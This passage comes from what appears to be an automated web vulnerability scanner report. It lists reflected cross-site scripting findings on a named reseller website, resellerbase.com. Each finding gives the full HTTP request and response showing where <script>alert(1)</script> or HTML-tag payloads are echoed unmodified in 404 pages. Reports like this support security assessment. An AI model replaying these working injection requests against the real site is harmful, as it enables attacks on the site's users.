Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27fae8<a>f3ea3b79b99 was not found on this server.</p>
...[SNIP]...

2.2415. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ab47<script>alert(1)</script>a06e77db8d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7ab47<script>alert(1)</script>a06e77db8d7/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7ab47<script>alert(1)</script>a06e77db8d7/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2416. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2af99<script>alert(1)</script>c34e2d4975 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/352af99<script>alert(1)</script>c34e2d4975/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/352af99<script>alert(1)</script>c34e2d4975/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2417. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e7873<script>alert(1)</script>bb9ec1e2cb8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themese7873<script>alert(1)</script>bb9ec1e2cb8/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themese7873<script>alert(1)</script>bb9ec1e2cb8/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2418. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 983c5<script>alert(1)</script>dea60f076d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos983c5<script>alert(1)</script>dea60f076d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos983c5<script>alert(1)</script>dea60f076d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2419. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 14edc<script>alert(1)</script>eea026fd428 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/search.php14edc<script>alert(1)</script>eea026fd428?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php14edc<script>alert(1)</script>eea026fd428?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2420. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f261f<a>daf1880243f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Searchf261f<a>daf1880243f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Searchf261f<a>daf1880243f&opt=2 was not found on this server.</p>
...[SNIP]...

2.2421. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f96f9<a>2e42bfee04b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...f96f9<a>2e42bfee04b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...f96f9<a>2e42bfee04b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2422. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2809<script>alert(1)</script>52f921775bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b2809<script>alert(1)</script>52f921775bb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b2809<script>alert(1)</script>52f921775bb=1 was not found on this server.</p>
...[SNIP]...

2.2423. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ca71a<a>8725c2adc71 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ca71a<a>8725c2adc71 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ca71a<a>8725c2adc71 was not found on this server.</p>
...[SNIP]...

2.2424. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d593d<script>alert(1)</script>56514771969 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild593d<script>alert(1)</script>56514771969/35/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild593d<script>alert(1)</script>56514771969/35/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2425. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76928<script>alert(1)</script>dd9e5de81ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3576928<script>alert(1)</script>dd9e5de81ba/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3576928<script>alert(1)</script>dd9e5de81ba/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2426. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4df69<script>alert(1)</script>5cdd35eec39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes4df69<script>alert(1)</script>5cdd35eec39/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes4df69<script>alert(1)</script>5cdd35eec39/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2427. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c90da<script>alert(1)</script>3dd8fc8cc7e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/search.phpc90da<script>alert(1)</script>3dd8fc8cc7e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.phpc90da<script>alert(1)</script>3dd8fc8cc7e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2428. http://www.resellerbase.com/detail/35/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7b853<a>7a047e6598c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search7b853<a>7a047e6598c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...&Submit3=Search7b853<a>7a047e6598c&opt=2 was not found on this server.</p>
...[SNIP]...

2.2429. http://www.resellerbase.com/detail/35/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ce71b<a>48af4b734ab was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/search.php?keyword=search...ce71b<a>48af4b734ab&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...ce71b<a>48af4b734ab&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2430. http://www.resellerbase.com/detail/35/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad5ea<script>alert(1)</script>fc2b0c7be69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2&ad5ea<script>alert(1)</script>fc2b0c7be69=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2&ad5ea<script>alert(1)</script>fc2b0c7be69=1 was not found on this server.</p>
...[SNIP]...

2.2431. http://www.resellerbase.com/detail/35/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7e996<a>08d29b67df9 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=27e996<a>08d29b67df9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=27e996<a>08d29b67df9 was not found on this server.</p>
...[SNIP]...

2.2432. http://www.resellerbase.com/detail/36/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 784ec<script>alert(1)</script>25920f9ce56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail784ec<script>alert(1)</script>25920f9ce56/36/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
